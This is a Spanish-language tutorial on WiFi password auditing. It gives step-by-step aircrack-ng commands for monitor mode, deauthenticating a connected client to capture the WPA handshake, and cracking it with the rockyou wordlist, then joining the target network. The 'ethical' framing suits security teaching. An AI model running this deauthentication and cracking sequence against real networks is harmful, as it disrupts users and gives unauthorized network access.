Hacking ético WIFI

Como realizar auditorias wifi en entornos controlados de forma ética.

Aircrack-NG

Preparación

Lo primero que debemos hacer, será preparar nuestro entorno y herramientas de trabajo. Para ello crearemos una carpeta donde guardaremos:

  • diccionario rockyou

  • toda la información que recopilemos a medida que vayamos trabajando

Descargaremos rockyou y lo guardaremos en la carpeta previamente creada. Luego, desde el terminal, nos ubicaremos en el directorio de dicha carpeta. En mi caso la carpeta la ubicaré en el Escritorio con el nombre "wifi_pentest"

Por último, instalaremos aircrack-ng

sudo apt install aircrack-ng

Identificación de la red a auditar

Primero tendremos que saber que nombre tiene la red que queremos auditar, para ello simplemente miramos las redes disponibles que tengamos cerca. En mi caso se llamará "Red_ejemplo"

Una vez identificada, abriremos el terminal y copiaremos la interfaz de nuestra antena wifi, para posteriormente ponerla en modo monitor con la herramienta airckark-ng

# miramos configuración de red
ifconfig

# buscamos interfaz de antena wifi
wlp1s0 # algo parecido a esto

# ponemos la interfaz en modo monitor
sudo airmon-ng start wlp1s0 

Una vez puesto en modo monitor, podemos observar que ya no tendremos la opción de conectarnos a ningún Wifi. Podemos comprobar que lo hemos hecho correctamente verificando si la interfaz de la antena está en modo escucha.

# miramos configuración de red
ifconfig

# buscamos interfaz de antena wifi
wlp1s0mon # algo parecido a esto

Ahora enumeraremos las redes Wifi que tengamos a nuestro alcance.

sudo airodump-ng wlp1s0mon

Se nos comenzará a listar todas las redes Wifi disponibles. Ahora debemos localizar en la columna "ESSID" la red que queremos auditar. En mi caso buscaré "Red_ejemplo" Una vez encontremos la red, deberemos fijarnos en la información de las siguientes dos columnas:

  • CH

  • BSSID

El número que aparece en CH, nos indica el canal donde está corriendo la red wifi y deberemos memorizarla, ya que suele ser uno o dos números. El número que aparece en BSSID es un poco más largo y deberemos copiarlo.

Ahora que ya tenemos más información sobre la red a auditar, lanzaremos un comando que nos permitirá escuchar la red objetivo. Lo único que debemos hacer una vez lanzado el comando, será esperar a que alguien dentro de la red haga alguna actividad haciendo uso de internet. Cuando esto pase, nos aparecerá una nueva fila con información.

# sustituir @CH y @BSSID por info conseguida previamente
# sustituir wlp1s0mon por interfaz de antena en uso

sudo airodump-ng -c @CH --bssid @BSSID -w auditoria wlp1s0mon

La información que nos interesa coger ahora será:

  • BSSID

  • STATION

Ejecución de aircrack-ng

Para no perder está información, que consultaremos de nuevo más adelante, abriremos una nueva pestaña del terminal e introduciremos el siguiente comando para mandar trafico a la red:

# sustituir @BSSID y @STATION por info conseguida previamente
# sustituir wlp1s0mon por interfaz de antena en uso

sudo aireplay-ng -0 9 -a @BSSID -c @STATION wlp1s0mon

Ejecutaremos este comando 3-4 veces (para expulsar la estación) hasta que veamos que en la pestaña donde teníamos la información de escucha de la red objetivo aparezca:

  • WPA handshake: xx:xx:xx:xx:xx:xx

Una vez obtenido, ya podemos cerrar el proceso de escucha. Aplicaremos un >ls para ver los archivos que hemos generado con la herramienta. El archivo que usaremos será:

  • auditoria-01.cap

Ataque final

Ejecutamos el siguiente comando para efectuar el ataque de diccionario. En este caso usamos rockyou pero podemos usar el diccionario que queramos.

# sustituir @handshake por info conseguida previamente
sudo aircrack-ng -b @handshake -w rockyou.txt auditoria-01.cap

Empezará a ejecutarse el ataque. Ahora solo quedará esperar.

En caso de haber conseguido la contraseña, ahora habrá que cambiar el estado de la interfaz Wifi, ya que aun sigue en modo monitor. Para ello aplicamos el siguiente comando:

# sustituir wlp1s0mon por interfaz de antena en uso
sudo airmon-ng stop wlp1s0mon

# para comprobar estado de interfaz de red
ifconfig

Por último, solo faltará entrar a la red objetivo como Pedro por su casa como haríamos en una red de casa.


Toda la información esta sacada de este video. Gracias El Pingüino de Mario

Última actualización